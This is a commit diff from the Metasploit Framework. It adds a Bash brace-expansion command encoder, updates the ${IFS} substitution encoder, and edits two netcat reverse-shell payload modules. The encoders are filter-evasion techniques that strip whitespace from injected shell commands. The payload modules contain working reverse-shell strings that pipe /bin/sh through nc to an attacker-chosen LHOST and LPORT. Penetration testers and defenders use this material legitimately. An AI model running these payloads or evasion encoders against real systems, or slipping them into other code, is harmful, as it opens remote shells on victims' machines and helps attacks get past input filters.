Land #10516, Add brace expansion encoder and update ${IFS} encoder

lib/msf/core/encoder.rb

@@ -136,9 +136,13 @@ class Encoder < Module
     #
     CmdUnixEcho = 'echo'
     #
-    # Bourne shell IFS encoding.
+    # Bourne shell ${IFS} encoding.
     #
-    CmdUnixIfs = 'ifs'
+    CmdUnixIFS = 'ifs'
+    #
+    # Bash brace expansion encoding.
+    #
+    CmdUnixBrace = 'brace'
   end
 
   #

modules/encoders/cmd/brace.rb

@@ -0,0 +1,33 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder
+
+  # This may produce incorrect code due to minimal escaping
+  Rank = LowRanking
+
+  def initialize
+    super(
+      'Name'        => 'Bash Brace Expansion Command Encoder',
+      'Description' => %q{
+        This encoder uses brace expansion in Bash and other shells
+        to avoid whitespace without being overly fancy.
+      },
+      'Author'      => ['wvu', 'egypt'],
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'EncoderType' => Msf::Encoder::Type::CmdUnixBrace
+    )
+  end
+
+  def encode_block(state, buf)
+    # Skip encoding if there are no badchars
+    return buf if state.badchars !~ /\s/
+
+    # Perform brace expansion encoding
+    "{#{buf.gsub(',', '\\,').gsub(/\s+/, ',')}}"
+  end
+
+end

modules/encoders/cmd/ifs.rb

@@ -5,39 +5,29 @@
 
 class MetasploitModule < Msf::Encoder
 
-  # Below normal ranking because this will produce incorrect code a lot of
+  # This may produce incorrect code, such as in quoted strings
-  # the time.
   Rank = LowRanking
 
   def initialize
     super(
-      'Name'             => 'Generic ${IFS} Substitution Command Encoder',
+      'Name'        => 'Bourne ${IFS} Substitution Command Encoder',
-      'Description'      => %q{
+      'Description' => %q{
-        This encoder uses standard Bourne shell variable substitution
+        This encoder uses Bourne ${IFS} substitution to avoid whitespace
-        to avoid spaces without being overly fancy.
+        without being overly fancy.
       },
-      'Author'           => 'egypt',
+      'Author'      => ['egypt', 'wvu'],
-      'Arch'             => ARCH_CMD,
+      'Platform'    => 'unix',
-      'Platform'         => 'unix',
+      'Arch'        => ARCH_CMD,
-      'EncoderType'      => Msf::Encoder::Type::CmdUnixIfs)
+      'EncoderType' => Msf::Encoder::Type::CmdUnixIFS
+    )
   end
 
-
-  #
-  # Encodes the payload
-  #
   def encode_block(state, buf)
-    # Skip encoding for empty badchars
+    # Skip encoding if there are no badchars
-    if state.badchars.length == 0
+    return buf if state.badchars !~ /\s/
-      return buf
-    end
 
-    # Skip encoding unless space is a badchar
+    # Perform ${IFS} encoding
-    unless state.badchars.include?(" ")
+    buf.gsub(/\s+/, '${IFS}')
-      return buf
-    end
-
-    buf.gsub!(/\s/, '${IFS}')
-    return buf
   end
+
 end

modules/payloads/singles/cmd/unix/reverse_netcat.rb

@@ -51,6 +51,6 @@ module MetasploitModule
   #
   def command_string
     backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
-    "mkfifo /tmp/#{backpipe}; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe} "
+    "mkfifo /tmp/#{backpipe}; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
   end
 end

modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb

@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 35
+  CachedSize = 34
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -45,6 +45,6 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh "
+    "nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh"
   end
 end